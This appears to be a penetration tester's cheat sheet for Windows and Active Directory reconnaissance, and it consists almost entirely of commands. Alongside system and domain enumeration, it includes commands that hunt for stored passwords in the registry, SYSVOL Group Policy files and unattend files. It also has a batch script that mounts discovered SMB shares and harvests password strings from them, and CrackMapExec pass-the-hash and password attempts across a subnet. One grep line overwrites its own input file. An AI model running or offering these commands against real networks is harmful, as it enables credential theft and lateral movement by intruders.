Windows Recon (Cheat Sheet)

Windows OS Enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find Goodies

Service Account Credentials within SYSVOL Group Policy Preferences (GPP)

findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xml

Find in files and registry

findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

GPO settings

gpresult /z
gpresult /H (for Pretty HTML output)

Users, Groups and Privileges

CMD

net localgroup administrators /domain
net group “Domain Controllers” /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net user /domain <UserName>

Powershell

Get-ADDomainController -filter * | select hostname, operatingsystem
Get-ADFineGrainedPasswordPolicy -filter *
Get-ADDefaultDomainPasswordPolicy
Get-ADUser <UserName>-Properties *
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where {$_.passwordNeverExpires -eq "true" } | Select-Object DistinguishedName,Name,Enabled
Get-ADGroupMember -identity <GroupName>
Get-ADComputer -filter * | select name
Get-GPO -all | select DisplayName, gpostatus

SMB File Shares

Find Hosts with SMB Open (Nmap)

nmap -vv -Pn -n -p 445 10.10.10.0/24 -oA smb_host
Format:
grep open smb_host.gnmap | awk {'print $2'} > smb_up.txt && cat smb_up.txt

Find Open Shares (PowerView)

Invoke-ShareFinder -HostList hosts_with_smb.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txt
If you want to remove the extra formatting of output in found_shares.txt, you can run:
grep -oP "(\s).?\-.*" found_shares.txt > found_shares.txt

Permissions (PowerView)

Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csv

Find Interesting file names from Share list (PowerView)

Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-List

Batch Script to search for in-file passwords in open shares found from steps above.

@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
 C:
 NET USE Z: /delete /y
 net use z: “%%a”
 Z:
 echo %%a
 echo %%a >> "C:\Temp\output_file.txt"
 if exist z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)

Use password or hash for authentication (using CrackMapExec)

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'

Lists

https://github.com/danielmiessler/SecLists